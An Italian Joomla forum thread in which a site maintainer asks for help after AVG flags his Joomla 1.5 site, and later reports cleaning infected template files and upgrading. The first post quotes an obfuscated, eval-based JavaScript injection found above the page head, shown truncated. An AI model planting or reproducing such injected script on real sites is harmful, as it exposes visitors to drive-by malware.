[Joomla 1.5] Script sopra l'head

Moderator: alexred

Forum rules
Regole Forum
Locked
User avatar
robertosalemi
Joomla! Apprentice
Joomla! Apprentice
Posts: 47
Joined: Wed Sep 19, 2012 3:45 pm
Location: Acicatena, Catania

[Joomla 1.5] Script sopra l'head

Post by robertosalemi » Mon Apr 29, 2013 11:21 am

Salve utenti,
ho preso in cura un sito web realizzato con Joomla 1.5.

Appena entro AVG lo blocca! Mi sono accorto che in sopra l'head c'è il seguente codice:

Code: Select all

 <script>e=eval;v="0"+"x";a=0;try{a&=2}catch(q){a=1}if(!a){try{document["\x62ody"]^=~1;}catch(q){a2="_"}z="10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_ ... _68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_35_68_77_77_6c_75_6b_4a_6f_70_73_6b_2f_6d_30_42_14_10_10_84"["split"](a2);s="";for(i=0;i<z.length;i++){s+=String["fromCharCode"](e(v+(z[i]))-5-2);}zaz=s;e(zaz);}</script>
Credo sia questo il problema vero? Ho scansionato tutti i file ma non l'ho trovato!

Appena lo rimuovo effettuo l'aggiornamento alla 1.5.26...

Qualche suggerimento? :(

Grazie.
Skype: robertino_salemi

User avatar
alikon
Joomla! Champion
Joomla! Champion
Posts: 5941
Joined: Fri Aug 19, 2005 10:46 am
Location: Roma
Contact:

Re: [Joomla 1.5] Script sopra l'head

Post by alikon » Tue Apr 30, 2013 5:46 am

Nicola Galgano
i know that i don't know
www.alikonweb.it

User avatar
robertosalemi
Joomla! Apprentice
Joomla! Apprentice
Posts: 47
Joined: Wed Sep 19, 2012 3:45 pm
Location: Acicatena, Catania

Re: [Joomla 1.5] Script sopra l'head

Post by robertosalemi » Tue Apr 30, 2013 9:15 am

Salve,
scusami, ma i tuoi link a cosa potrebbero servirmi?

Ho risolto il problema, ho trovato tutto le index.php dei vari template infette da codice malevole e ho aggiornato il sito alla versione 1.5.26.
Skype: robertino_salemi

User avatar
alikon
Joomla! Champion
Joomla! Champion
Posts: 5941
Joined: Fri Aug 19, 2005 10:46 am
Location: Roma
Contact:

Re: [Joomla 1.5] Script sopra l'head

Post by alikon » Tue Apr 30, 2013 6:42 pm

magari aiutare a trovare l'hack e/o evitare che il problema si ripeta
???
Nicola Galgano
i know that i don't know
www.alikonweb.it

User avatar
robertosalemi
Joomla! Apprentice
Joomla! Apprentice
Posts: 47
Joined: Wed Sep 19, 2012 3:45 pm
Location: Acicatena, Catania

Re: [Joomla 1.5] Script sopra l'head

Post by robertosalemi » Tue Apr 30, 2013 9:27 pm

ok, grazie! :D
Skype: robertino_salemi


Locked

Return to “Italian Forum”